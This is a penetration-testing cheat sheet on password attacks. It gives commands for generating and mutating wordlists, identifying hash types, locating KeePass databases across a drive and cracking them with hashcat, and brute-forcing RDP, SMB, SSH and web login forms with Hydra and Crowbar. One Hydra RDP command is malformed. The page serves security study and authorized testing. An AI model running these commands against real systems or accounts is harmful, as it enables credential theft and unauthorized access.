Password Attacks

Generating Wordlists

Cewl - Custom Word List generator

-> generating wordlist based on information from a website

cewl <domain> -w wordlist.txt

Crunch - Wordlist Generator

-> Character Translation @ = Lower case alpha characters , = Upper case alpha characters % = Numeric characters ^ = Special characters including space

-> Usage

./crunch <min-len> <max-len> [charset]

-> basic examples

crunch 9 9 -t ,@@@@^%%%

crunch 4 6 0123456789abcdef -o wordlist.txt

John Mutation

-> Add the rules you want in the /etc/john/john.conf file inside the rules module [List.Rules:Wordlist] to modify your wordlists -> basic rule example $@$[1-2]$[0-9]$[0-9]$[0-9]

john --wordlist=wordlist.txt --rules --stdout > mutated.txt

https://www.openwall.com/john/doc/RULES.shtml

Cracking Password

Identifying Hash Type

hashid <hash>

https://www.tunnelsup.com/hash-analyzer/ https://hashes.com/en/tools/hash_identifier

Hashing different file types for cracking with 2john

Password Manager

-> Search KeePass database files

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

-> Hashing the .kdbx file

keepass2john Database.kdbx > keepass.hash

-> Finding Hash-Mode ID of hashcat

hashcat --help | grep -i "KeePass"

-> Cracking

hashcat -m 13400 keepass.hash

Brute Force Attacks

RDP Brute Force - Hydra

hydra -L /usr/share/wordlists/rockyou.txt t -p "<password" rdp://<IP>

RDP Brute Force - Crowbar

crowbar -b rdp -s X.X.X.X/32 -u admin -C /usr/share/wordlists/rockyou.txt -n 1

SMB Brute Force - Hydra

hydra -L /root/Desktop/user.txt -P /usr/share/wordlists/rockyou.txt <IP> smb

SSH Brute Force - Hydra

hydra -l <user> -P /usr/share/wordlists/rockyou.txt ssh://<IP>

hydra -l <user> -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:user=admin&pass=^PASS^:Invalid Login" -vV -f

hydra -l <username> -P /usr/share/wordlists/rockyou.txt -f <IP> http-get /login

PreviousLinux Enum & Privilege Escalation NextPort Fowarding and Proxying

Last updated 2 years ago

hashtagGenerating Wordlists

hashtagCewl - Custom Word List generator

hashtagCrunch - Wordlist Generator

hashtagJohn Mutation

hashtagCracking Password

hashtagIdentifying Hash Type

hashtagHashing different file types for cracking with 2john

hashtagPassword Manager

hashtagBrute Force Attacks

hashtagRDP Brute Force - Hydra

hashtagRDP Brute Force - Crowbar

hashtagSMB Brute Force - Hydra

hashtagSSH Brute Force - Hydra

hashtagHTTP POST Login Form Brute Force - Hydra

hashtagHTTP GET Login Form Brute Force - Hydra